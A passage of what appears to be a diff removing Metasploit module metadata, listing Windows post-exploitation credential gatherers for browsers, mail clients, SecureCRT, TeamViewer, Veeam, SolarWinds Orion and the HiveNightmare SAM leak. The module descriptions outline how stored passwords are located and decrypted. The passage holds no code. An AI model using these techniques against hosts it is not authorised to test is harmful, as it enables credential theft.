"/modules/post/windows/gather/credentials/safari.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/safari", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/seamonkey": { - "name": "Seamonkey credential gatherer", - "fullname": "post/windows/gather/credentials/seamonkey", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for seamonkey credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/seamonkey.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/seamonkey", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/securecrt": { - "name": "Windows SecureCRT Session Information Enumeration", - "fullname": "post/windows/gather/credentials/securecrt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "HyperSine", - "Kali-Team " - ], - "description": "This module will determine if SecureCRT is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.\n\n Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.", - "references": [ - "URL-https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/securecrt.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/securecrt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/skype": { - "name": "Windows Gather Skype Saved Password Hash Extraction", - "fullname": "post/windows/gather/credentials/skype", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix ", - "hdm " - ], - "description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5", - "references": [ - "URL-http://www.recon.cx/en/f/vskype-part2.pdf", - "URL-https://web.archive.org/web/20140207115406/http://insecurety.net/?p=427", - "URL-https://github.com/skypeopensource/tools" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/skype.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/skype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/smartermail": { - "name": "Windows Gather SmarterMail Password Extraction", - "fullname": "post/windows/gather/credentials/smartermail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joe Giron", - "bcoles ", - "sinn3r " - ], - "description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.", - "references": [ - "URL-http://www.gironsec.com/blog/tag/cracking-smartermail/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/smartermail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/smartermail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/smartftp": { - "name": "Windows Gather SmartFTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/smartftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module finds saved login credentials\n for the SmartFTP FTP client for windows.\n It finds the saved passwords and decrypts\n them.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/smartftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/smartftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/solarwinds_orion_dump": { - "name": "SolarWinds Orion Secrets Dump", - "fullname": "post/windows/gather/credentials/solarwinds_orion_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-08", - "type": "post", - "author": [ - "npm ", - "Rob Fuller" - ], - "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with SolarWinds Orion NPM installed. The module\n supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n extraction and decryption of the data are provided to allow session migration\n during execution in order to log in to the SQL database using SSPI. Tested on\n the 2020 version of SolarWinds Orion NPM. This module is possible only because\n of the source code and technical information published by Rob Fuller and\n Atredis Partners.", - "references": [ - "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/", - "URL-https://github.com/atredispartners/solarwinds-orion-cryptography" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/solarwinds_orion_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt SolarWinds Orion database export CSV file" - }, - { - "name": "Dump", - "description": "Export SolarWinds Orion database and perform decryption" - }, - { - "name": "Export", - "description": "Export SolarWinds Orion database without decryption" - } - ] - }, - "post_windows/gather/credentials/spark_im": { - "name": "Windows Gather Spark IM Password Extraction", - "fullname": "post/windows/gather/credentials/spark_im", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" " - ], - "description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract encrypted\n password but will also decrypt password using public key.", - "references": [ - "URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/spark_im.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/spark_im", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/srware": { - "name": "Srware credential gatherer", - "fullname": "post/windows/gather/credentials/srware", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Srware credentials on a Windows host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/srware.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/srware", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/sso": { - "name": "Windows Single Sign On Credential Collector (Mimikatz)", - "fullname": "post/windows/gather/credentials/sso", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/sso.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/sso", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/steam": { - "name": "Windows Gather Steam Client Session Collector.", - "fullname": "post/windows/gather/credentials/steam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nikolai Rusakov " - ], - "description": "This module will collect Steam session information from an\n account set to autologin.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/steam.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/steam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/sylpheed": { - "name": "Sylpheed email credential gatherer", - "fullname": "post/windows/gather/credentials/sylpheed", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Sylpheed email client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/sylpheed.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/sylpheed", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/tango": { - "name": "Tango credential gatherer", - "fullname": "post/windows/gather/credentials/tango", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tango credentials on a Windows host. Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tango.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tango", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/teamviewer_passwords": { - "name": "Windows Gather TeamViewer Passwords", - "fullname": "post/windows/gather/credentials/teamviewer_passwords", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nic Losby ", - "Kali-Team " - ], - "description": "This module will find and decrypt stored TeamViewer passwords", - "references": [ - "CVE-2019-18988", - "URL-https://whynotsecurity.com/blog/teamviewer/", - "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/teamviewer_passwords", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/thunderbird": { - "name": "Thunderbird credential gatherer", - "fullname": "post/windows/gather/credentials/thunderbird", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for thunderbird credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/thunderbird.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/thunderbird", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/thycotic_secretserver_dump": { - "name": "Delinea Thycotic Secret Server Dump", - "fullname": "post/windows/gather/credentials/thycotic_secretserver_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-08-15", - "type": "post", - "author": [ - "npm " - ], - "description": "This module exports and decrypts Secret Server credentials to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with Delinea/Thycotic\n Secret Server installed. Master Encryption Key (MEK) and associated IV values are\n decrypted from encryption.config using a static key baked into the software. The\n module also supports parameter recovery for encryption configs configured with\n Windows DPAPI.", - "references": [ - "URL-https://github.com/denandz/SecretServerSecretStealer" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-29 13:58:54 +0000", - "path": "/modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/thycotic_secretserver_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Dump", - "description": "Export Secret Server database and perform decryption" - }, - { - "name": "Export", - "description": "Export Secret Server database without decryption" - } - ] - }, - "post_windows/gather/credentials/tlen": { - "name": "Tlen credential gatherer", - "fullname": "post/windows/gather/credentials/tlen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tlen credentials on a Windows host. Tlen is a free Polish instant messaging service.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tlen.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tlen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/tortoisesvn": { - "name": "Windows Gather TortoiseSVN Saved Password Extraction", - "fullname": "post/windows/gather/credentials/tortoisesvn", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Justin Cacak" - ], - "description": "This module extracts and decrypts saved TortoiseSVN passwords. In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tortoisesvn", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/total_commander": { - "name": "Windows Gather Total Commander Saved Password Extraction", - "fullname": "post/windows/gather/credentials/total_commander", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/total_commander.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/total_commander", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/trillian": { - "name": "Windows Gather Trillian Password Extractor", - "fullname": "post/windows/gather/credentials/trillian", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sil3ntDre4m ", - "Unknown" - ], - "description": "This module extracts account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/trillian.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/trillian", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/veeam_credential_dump": { - "name": "Veeam Backup and Replication Credentials Dump", - "fullname": "post/windows/gather/credentials/veeam_credential_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-22", - "type": "post", - "author": [ - "npm " - ], - "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.", - "references": [ - "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/veeam_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt Veeam database export CSV files" - }, - { - "name": "Dump", - "description": "Export Veeam databases and perform decryption" - }, - { - "name": "Export", - "description": "Export Veeam databases without decryption" - } - ] - }, - "post_windows/gather/credentials/viber": { - "name": "Viber credential gatherer", - "fullname": "post/windows/gather/credentials/viber", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in Viber desktop application on a remote Windows host. Viber is a cross-platform voice over IP and instant messaging software application.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/viber.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/viber", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/vnc": { - "name": "Windows Gather VNC Password Extraction", - "fullname": "post/windows/gather/credentials/vnc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kurt Grutzmacher ", - "mubix " - ], - "description": "This module extract DES encrypted passwords in known VNC locations", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/vnc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/vnc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/whatsupgold_credential_dump": { - "name": "WhatsUp Gold Credentials Dump", - "fullname": "post/windows/gather/credentials/whatsupgold_credential_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-22", - "type": "post", - "author": [ - "sshah ", - "npm " - ], - "description": "This module exports and decrypts credentials from WhatsUp Gold to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with WhatsUp\n Gold installed. The module has been tested on and can successfully decrypt\n credentials from WhatsUp versions 11.0 to the latest (22.x). Extracted\n credentials are automatically added to loot.", - "references": [ - "CVE-2022-29845", - "CVE-2022-29846", - "CVE-2022-29847", - "CVE-2022-29848", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29845", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29846", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29847", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29848", - "URL-https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/whatsupgold_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt WhatsUp Gold database export CSV file" - }, - { - "name": "Dump", - "description": "Export WhatsUp Gold database and perform decryption" - }, - { - "name": "Export", - "description": "Export WhatsUp Gold database without decryption" - } - ] - }, - "post_windows/gather/credentials/winbox_settings": { - "name": "Windows Gather Mikrotik Winbox \"Keep Password\" Credentials Extractor", - "fullname": "post/windows/gather/credentials/winbox_settings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Pasquale 'sid' Fiorillo" - ], - "description": "This module extracts Mikrotik Winbox credentials saved in the\n \"settings.cfg.viw\" file when the \"Keep Password\" option is\n selected in Winbox.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-09 00:43:10 +0000", - "path": "/modules/post/windows/gather/credentials/winbox_settings.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/winbox_settings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windows_autologin": { - "name": "Windows Gather AutoLogin User Credential Extractor", - "fullname": "post/windows/gather/credentials/windows_autologin", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Myo Soe" - ], - "description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.", - "references": [ - "URL-http://support.microsoft.com/kb/315231", - "URL-http://core.yehg.net/lab/#tools.exploits" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windows_autologin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windows_sam_hivenightmare": { - "name": "Windows SAM secrets leak - HiveNightmare", - "fullname": "post/windows/gather/credentials/windows_sam_hivenightmare", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-07-20", - "type": "post", - "author": [ - "Kevin Beaumont", - "romarroca", - "Yann Castel (yann.castel " - ], - "description": "Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged\n user to read those files. But, as they are locked while Windows is running we are not able\n to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally\n enabled, to finally have a read access. Once SAM and SYSTEM files are successfully dumped and\n stored in `store_loot`, you can dump the hashes with some external scripts like secretsdump.py", - "references": [ - "CVE-2021-36934", - "URL-https://github.com/GossiTheDog/HiveNightmare", - "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652", - "URL-https://github.com/romarroca/SeriousSam" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windows_sam_hivenightmare", - "check": false, - "post_auth": false, - "default_credential": false, 